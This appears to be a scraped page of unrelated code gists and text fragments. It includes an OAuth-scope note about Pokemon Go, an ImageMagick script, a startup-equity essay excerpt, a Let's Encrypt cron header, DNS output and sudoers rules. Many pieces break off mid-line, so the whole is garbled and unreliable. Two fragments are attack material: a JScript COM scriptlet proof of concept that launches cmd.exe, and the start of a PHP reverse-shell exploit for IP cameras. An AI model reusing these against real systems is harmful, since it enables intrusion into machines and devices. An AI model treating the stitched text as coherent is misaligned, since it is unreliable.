Kenn White kennwhite

TLDR: Pokemon Go can't read your gmail - I checked

Pokemon tokens are requested with these understandable scopes:

openid
email
https://www.googleapis.com/auth/userinfo.email
https://www.google.com/accounts/OAuthLogin (which seems to force either an old oauth flow, or make google to represent the "Full Account Access" incorrectly)

Here is the actual URL that loads in the webview on iOS: https://accounts.google.com/ServiceLogin?passive=1209600&continue=https://accounts.google.com/o/oauth2/programmatic_auth?scope%3Dopenid%2Bemail%2Bhttps://www.google.com/accounts/OAuthLogin%2Bhttps://www.googleapis.com/auth/userinfo.email%26client_id%3D848232511240-73ri3t7plvk96pj4f85uj8otdat2alem.apps.googleusercontent.com%26from_login%3D1%26as%3D-....&ltmpl=embedded&oauth=1&sarp=1&scc=1

Description

This simple script will take a picture of a whiteboard and use parts of the ImageMagick library with sane defaults to clean it up tremendously.

The script is here:

#!/bin/bash
convert "$1" -morphology Convolve DoG:15,100,0 -negate -normalize -blur 0x1 -channel RBG -level 60%,91%,0.1 "$2"

Results

What I Wish I'd Known About Equity Before Joining A Unicorn

Disclaimer: This piece is written anonymously. The names of a few particular companies are mentioned, but as common examples only.

This is a short write-up on things that I wish I'd known and considered before joining a private company (aka startup, aka unicorn in some cases). I'm not trying to make the case that you should never join a private company, but the power imbalance between founder and employee is extreme, and that potential candidates would

	#!/bin/bash
	# This is free and unencumbered software released into the public domain.
	#
	# This script is designed to be run daily by cron. Please run it with randomness in its timing to
	# avoid load spikes at Let's Encrypt. One example, running between midnight at 2 AM, would be:
	#
	# 0 0 * * * sleep $[(RANDOM % 115)+5]m ; /usr/sbin/letsencrypt-renew.sh
	#
	# If you aren't using Nginx, adjust the startServer and stopServer methods to suit. Also, you could
	# use the webroot method.

	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="Empire"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
	<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

	type WriteDB struct {
	Conn *sql.DB
	Err error
	}

	func (db *WriteDB) Do(
	update,
	title,
	updated_at,
	updated_by,

	$ dig calendar.google.com @208.67.222.222

	; <<>> DiG 9.8.3-P1 <<>> calendar.google.com @208.67.222.222
	;; global options: +cmd
	;; Got answer:
	;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19048
	;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

	;; QUESTION SECTION:
	;calendar.google.com. IN A

	<?php
	/*
	NB: THIS PoC ONLY WORKS IN QEMU USERMODE EMULATION!
	If anyone wants to fix this, go ahead (no pun intended).
	However, I don't have a vulnerable product and am unwilling to acquire one.

	-------------------------

	UCam247/Phylink/Titathink/YCam/Anbash/Trivision/Netvision/others
	remote code exec: reverse shell PoC.

	# Enter this command to create a sudoers override/include file:
	# sudo visudo -f /etc/sudoers.d/nginx.overrides

	# (Make sure you actually have this in your /etc/sudoers - Run `sudo visudo` to check)
	# #includedir /etc/sudoers.d

	# This file assumes your deployment user is `deploy`

	# Nginx Commands
	Cmnd_Alias NGINX_RESTART = /usr/sbin/service nginx restart